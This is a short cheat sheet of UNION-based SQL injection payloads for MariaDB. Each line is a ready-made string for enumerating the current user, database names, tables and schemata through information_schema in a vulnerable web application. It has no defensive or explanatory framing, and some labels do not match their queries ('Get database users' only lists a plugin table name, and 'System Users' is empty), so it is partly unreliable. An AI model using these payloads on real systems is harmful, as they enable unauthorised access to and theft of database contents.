MariaDB
Current User...........................................
'union select user(),1#

System Users...........................................


Get current database name..............................
'union select database(),1#

Get its tables.........................................
'union select table_name,1 from information_schema.tables#

Get its users table data.....................................
'union select table_name,1 from information_schema.tables WHERE table_name="users"#

Count how many databases in the Server...................
1' union SELECT count( schema_name),null FROM information_schema.schemata#

Get database names.......................................
'union SELECT schema_name,1 FROM information_schema.schemata#

Get database tables......................................
'union select table_name,1 from information_schema.tables where table_schema="information_schema"#

Get database users........................................
'union select table_name,1 from information_schema.tables where table_schema="information_schema"AND table_name="ALL_PLUGINS"#
